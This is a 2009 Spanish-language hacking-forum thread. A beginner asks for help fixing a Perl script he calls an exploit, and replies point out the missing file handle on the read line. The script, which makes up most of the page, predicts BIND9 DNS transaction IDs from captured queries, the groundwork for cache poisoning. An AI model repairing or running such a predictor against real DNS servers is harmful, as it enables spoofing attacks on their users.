elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [Perl] No encuentro el Syntax Error
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Perl] No encuentro el Syntax Error  (Leído 3,719 veces)
7cuatro

Desconectado Desconectado

Mensajes: 3


Ver Perfil
[Perl] No encuentro el Syntax Error
« en: 24 Febrero 2009, 02:13 am »

hola que tal este es mi primer post estuve googleando un poco espero que mi post no sea de molestia bueno el tema es que quiero compilar un exploit en perl meda el siguiente error



espero sepan que pasa espero respuestas otra cosa tengo esta versión del compilador  ActivePerl-5.10.0.1004-MSWin32-x86-287188.msi

ando en windows xp o si hay otro compilador en perl por fabol aganmelo saber please gracias :xD


« Última modificación: 28 Febrero 2009, 11:34 am por sirdarckcat » En línea

~[uNd3rc0d3]~

Desconectado Desconectado

Mensajes: 188


programando...


Ver Perfil
Re: ayuda con perl
« Respuesta #1 en: 24 Febrero 2009, 04:00 am »

y si es windows porque pones bash?? xD deja no importa...

"compilar exploit en perl" aca hay dos errores ya de por si....

1.perl es un interpretado, no se compila
2.si es perl lo mas probable es que sea a nivel web...este post iria en el subforo.

ademas te esta diciendo que en la linea 30 hay un error....

seguramente sea una Poc y si no posteas el codigo es imposible que sepamos que esta mal

de todas manera tendrias que aprender perl asi por lo menos tenes algo de merito no?


En línea


leete las reglas asi todos estamos mejor ;)
7cuatro

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Re: ayuda con perl
« Respuesta #2 en: 24 Febrero 2009, 04:06 am »

este es el codigo

Código:
# For BIND9 v9.2.3-9.4.1:
$tap1=0x80000057;
$tap2=0x80000062;

# For BIND9 v9.0.0-9.2.2:
# $tap1=0xc000002b; # (0x80000057>>1)|(1<<31)
# $tap2=0xc0000061; # (0x800000c2>>1)|(1<<31)

$initial_guess_bits=6;
@cand_lfsr1=();
@cand_lfsr2=();

use Time::HiRes qw(gettimeofday);

@txid=();

# Read all data from file. It is assumed to be in the format generated
# by the XSL transformation described in appendix A.

$count=0;
open(FD,$ARGV[0]) or die "ERROR: Can't open file $ARGV[0]";
while(my $line=)
{
# File format: TXID[4 hex] (ignore everything beyond those 4 digits)

if ($line=~/^([0-9a-fA-F]{4})/x)
{
push @txid,hex($1);
$count++;
}
else
{
die "ERROR: Can't parse line at count=$count.\n";
}
}
close(FD);

print "INFO: Found $count DNS queries in file.\n";

sub next_trxid
{
my ($lfsr1,$lfsr2)=@_;
my $val;
for (my $i=0;$i<$count+1;$i++)
{
$val=($lfsr1^$lfsr2) & 0xFFFF;
$skip1=$lfsr1 & 1;
$skip2=$lfsr2 & 1;
for (my $j1=0;$j1<=$skip2;$j1++)
{
$lfsr1 = ($lfsr1>>1) ^ (($lfsr1 & 1)*$tap1);
}
for (my $j2=0;$j2<=$skip1;$j2++)
{
$lfsr2 = ($lfsr2>>1) ^ (($lfsr2 & 1)*$tap2);
}
#printf "%04x ",$val;
}
return $val;
}

sub verify
{
my ($lfsr1,$width1,$lfsr2,$width2)=@_;

for (my $i=0;$i<$count;$i++)
{
my $cand=($lfsr1^$lfsr2) & 0xFFFF;
my $min_width=($width1<=$width2) ? $width1 : $width2;
$min_width=($min_width<=16) ? $min_width : 16;
if ($min_width<=0)
{
return 1;
}
my $mask=(1<<$min_width)-1;
if (($cand & $mask) != ($txid[$i] & $mask))
{
return 0;
}

$skip1=$lfsr1 & 1;
$skip2=$lfsr2 & 1;
for (my $j1=0;$j1<=$skip2;$j1++)
{
$lfsr1 = ($lfsr1>>1) ^ (($lfsr1 & 1)*$tap1);
if ($width1<32)
{
$width1--;
}
}
for (my $j2=0;$j2<=$skip1;$j2++)
{
$lfsr2 = ($lfsr2>>1) ^ (($lfsr2 & 1)*$tap2);
if ($width2<32)
{
$width2--;
}
}
}
return 1;
}

sub phase2
{
my ($lfsr1,$width1,$lfsr2,$width2)=@_;

my $motion_detected=0;

if ($width1<32)
{
my $guess_0=verify($lfsr1|(0<<$width1),$width1+1,$lfsr2,$width2);
my $guess_1=verify($lfsr1|(1<<$width1),$width1+1,$lfsr2,$width2);
if ($guess_0 ^ $guess_1)
{
#Exactly one is correct. So we know the bit.
$motion_detected=1;
if ($guess_1)
{
$lfsr1=$lfsr1|(1<<$width1);
}
$width1++;
}
elsif ((!$guess_0) and (!$guess_1))
{
# Inconsistent state, hence wrong guess in the first place
return 0;
}
}

if ($width2<32)
{
my $guess_0=verify($lfsr1,$width1,$lfsr2|(0<<$width2),$width2+1);
my $guess_1=verify($lfsr1,$width1,$lfsr2|(1<<$width2),$width2+1);
if ($guess_0 ^ $guess_1)
{
#Exactly one is correct. So we know the bit.
$motion_detected=1;
if ($guess_1)
{
$lfsr2=$lfsr2|(1<<$width2);
}
$width2++;
}
elsif ((!$guess_0) and (!$guess_1))
{
# Inconsistent state, hence wrong guess in the first place
return 0;
}
}

if (($width1==32) and ($width2==32))
{
# Final verification
if (verify($lfsr1,32,$lfsr2,32))
{
push @cand_lfsr1,$lfsr1;
push @cand_lfsr2,$lfsr2;
return 1;
}
else
{
# false alarm
return 0;
}
}

if ($motion_detected)
{
# At least one width was improved.
return phase2($lfsr1,$width1,$lfsr2,$width2);
}
else
{
# Resort to bit guessing.
if ($width1<32)
{
# Guessing another bit in LFSR1 and continuing...
return
phase2($lfsr1|(0<<$width1),$width1+1,$lfsr2,$width2)+
phase2($lfsr1|(1<<$width1),$width1+1,$lfsr2,$width2);
}
else
{
# Guessing another bit in LFSR2 and continuing...
return
phase2($lfsr1,$width1,$lfsr2|(0<<$width2),$width2+1)+
phase2($lfsr1,$width1,$lfsr2|(1<<$width2),$width2+1);
}
}
}

my $start_time=gettimeofday();

my $good=0;

for (my $lfsr1=0;$lfsr1<(1<<$initial_guess_bits);$lfsr1++)
{
my $lfsr2=($txid[0]^$lfsr1) & ((1<<$initial_guess_bits)-1);
if (verify($lfsr1,$initial_guess_bits,$lfsr2,$initial_guess_bits))
{
$good+=
phase2($lfsr1,$initial_guess_bits,$lfsr2,$initial_guess_bits);
}
}

my $end_time=gettimeofday();

print "INFO: ".$good." candidates found:\n";
for (my $k=0;$k<$good;$k++)
{
printf "***  LFSR1=0x%08x  LFSR2=0x%08x  Next_TRXID=0x%04x  ***\n",
$cand_lfsr1[$k],$cand_lfsr2[$k],
next_trxid($cand_lfsr1[$k],$cand_lfsr2[$k]);
}

print "INFO: Elapsed time: ".($end_time-$start_time)." seconds\n";

exit(0);

En línea

AlbertoBSD
Programador y
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.696


🏴 Libertad!!!!!


Ver Perfil WWW
Re: ayuda con perl
« Respuesta #3 en: 24 Febrero 2009, 16:11 pm »

y si es windows porque pones bash?? xD deja no importa...

No es bash en realidad solo es un Windows Modificado.

El error que te marca esta en la linea 23 y  30 si te fijas: corresponde al if que compara la linea contra la exprecion regular

Código
  1. if ($line=~/^([0-9a-fA-F]{4})/x)
  2. {
  3. push @txid,hex($1);
  4. $count++;
  5. }
  6.  

He visto un poco en :http://www.troubleshooters.com/codecorn/littperl/perlreg.htm y al parecer esta bien.

Luego lo pruebo en mi computadora a ver si me tira un error similar.

Saludos



En línea

7cuatro

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Re: ayuda con perl
« Respuesta #4 en: 24 Febrero 2009, 22:34 pm »

gracias espero que puedan dar una ayudita para poner ese codigo en orden :d ;D espero respuestas
En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: ayuda con perl
« Respuesta #5 en: 24 Febrero 2009, 22:49 pm »

Esos son los clásicos errores anti script kiddies y la línea 23 dice otra cosa  :rolleyes:

Código
  1. while(my $line=)
= que?

Además de que hay que pasar un archivo como parámetro  :P

Saludos
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
AlbertoBSD
Programador y
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.696


🏴 Libertad!!!!!


Ver Perfil WWW
Re: ayuda con perl
« Respuesta #6 en: 25 Febrero 2009, 03:56 am »

LOL haha bien que no lo vi la verdad no tenia perl en ese momento para verlo.

Saludos
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Ayuda] SQL syntax error
PHP
K4sS- 1 1,801 Último mensaje 26 Agosto 2012, 00:47 am
por alexander1712
error A2009: syntax error in expression
ASM
.:UND3R:. 3 3,955 Último mensaje 31 Agosto 2012, 16:08 pm
por _Enko
No encuentro mi error :(
Java
Ila26 3 2,210 Último mensaje 1 Diciembre 2013, 19:35 pm
por Zoik
Error Ejercicio JButton, no encuentro el error[Resuleto, se puede cerrar]
Java
MinW 0 1,820 Último mensaje 27 Diciembre 2013, 17:59 pm
por MinW
ayuda no encuentro el error!
PHP
ediporey2000 1 1,703 Último mensaje 23 Febrero 2014, 22:49 pm
por engel lex
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines